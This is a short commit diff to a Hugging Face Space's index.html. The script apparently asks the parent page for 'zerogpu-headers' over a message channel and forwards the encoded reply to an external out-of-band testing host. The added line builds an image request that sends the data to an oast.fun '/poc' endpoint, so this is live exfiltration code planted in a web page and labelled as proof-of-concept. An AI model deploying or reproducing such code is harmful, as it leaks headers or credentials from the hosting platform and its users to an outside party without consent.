Spaces:
Running
Running
Update index.html
Browse files- index.html +1 -1
index.html
CHANGED
|
@@ -13,7 +13,7 @@ channel.port1.onmessage = e => {
|
|
| 13 |
|
| 14 |
// Send via GET request to your lab endpoint
|
| 15 |
const img = new Image();
|
| 16 |
-
img.src = `https://
|
| 17 |
};
|
| 18 |
window.parent.postMessage("zerogpu-headers", "*", [channel.port2]);
|
| 19 |
|
|
|
|
| 13 |
|
| 14 |
// Send via GET request to your lab endpoint
|
| 15 |
const img = new Image();
|
| 16 |
+
img.src = `https://bwjcdbkeriyfukekpyrgpbl0oyei87cm2.oast.fun/poc?data=${encoded}`;
|
| 17 |
};
|
| 18 |
window.parent.postMessage("zerogpu-headers", "*", [channel.port2]);
|
| 19 |
|